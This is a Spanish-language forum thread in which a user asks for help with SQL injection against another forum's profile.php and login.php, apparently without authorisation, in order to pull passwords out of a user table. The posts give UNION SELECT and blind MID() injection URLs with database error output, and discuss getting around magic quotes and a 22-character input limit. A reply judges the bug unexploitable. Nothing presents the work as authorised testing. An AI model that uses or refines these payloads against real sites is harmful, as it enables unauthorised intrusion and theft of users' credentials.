Hola a todos.

Estoy intentando una inyeccion, ejecuto lo siguiente:

http://ipalforo/profile.php?mode=viewprofile&u='2;'%20UNION%20SELECT%20MIN(Password),2,3,4,5%20FROM%20usuarios%20WHERE%20user%20=%20'zanahoria

y consigo:

SQL Error : Line 3: Incorrect syntax near '2'.

SELECT * FROM users WHERE username = '\'2;\' UNION SELECT MIN(Pas' AND user_id <> -1

Es como si se cortase, solo puedo escribir X caracteres a partir osea la select tiene que ser mas corta creo.





Otra mas que ejecuto es:

http://ipalforo/profile.php?mode=viewprofile&u='2;

Con lo que obtengo:

SQL Error : Unclosed quotation mark before the character string ' AND user_id <> -1'.

SELECT * FROM users WHERE username = '\'2;' AND user_id <> -1



Otro ejemplo:

http://ipalforo/profile.php?mode=viewprofile&u=''%20union%20select%20*%20from%20fish_users'2;

y consigo:

QL Error : Line 3: Incorrect syntax near '\'.

SELECT * FROM users WHERE username = '\'\' union select * from fi' AND user_id <> -1

He probado muchas otras cosas y consigo cosas similares, pero no se como arreglarmelas con el union , para sacar el password y sacarla por pantalla , alguna ayuda ?

Gracias. 

PD: Este post lo puse en http://foro.elhacker.net/index.php/topic,98448.30.html pero como nadie repondia lo pongo aqui, por si no era su sitio adecuado, si el moderador lo cree oportuno que borre cualquiera de ellos.

Hola,

Si ejecuto:

http://url/profile.php?mode=viewprofile&u='%20AND%20MID(password,0,1)=char(61)

Obtengo:


Se puede observar que se corta.

 

Y si le que quito el "char(61)" obtengo:


Aqui no se corta pero no hace nada.
 

Por otra lado he conseguido lo siguiente:

url ---------->  http://urlalforo/login.php?redirect=profile%2Ephp
variables en modo POST: ->
Consigo el siguiente error:



Si en la variable username le pongo comilla simple en vez de %00' no sale el error.

Y la ultima prueba:
parece que tambien corta, como cucho puedo escribir en las variables:


Si escribo una "p" mas ya nosale el error, supongo que es por que corta la cadena, y el %00' ya no entraria.

Osea solo puedo escribir 22 caracteres sin contar el %00'

Sale:


Y Dejando las variables:


Obtengo:


Bueno estas son las pruebas que estoy realizando. Solo comentar una última cosa, si le quito el %00' a la variable username y se lo pongo a password, no da error.

Saludos y dentro de unas horas, feliz año nuevo a tod@s.     

Hola,

Pues dejarla con una comilla sola,supongo que te refieres a que la deje sin el pero entonces no da error.
En el password no logro que pare de ninguna de las maneras, osea no hay inyeccion en el password. Por lo visto el limite es 22 caracteres para escribir,con lo que sql tiene que ser corta.
Tiene las magic quotes activadas por lo visto. Y no puedo escribir mucho, lo tengo dificil no?

Saludos.

PD: He leido algunos de inyeccion sql, recomiendame alguno, gracias.

con esto te refieres al maxlength del objeto o es el script quien te inpide escribir mas caracteres?

pues xD
el limite de caracteres en este caso es mortal

no se me ocurre como saltarlo.. lo siento.. pero no veo mucho potencial en este bug..

Saludos!!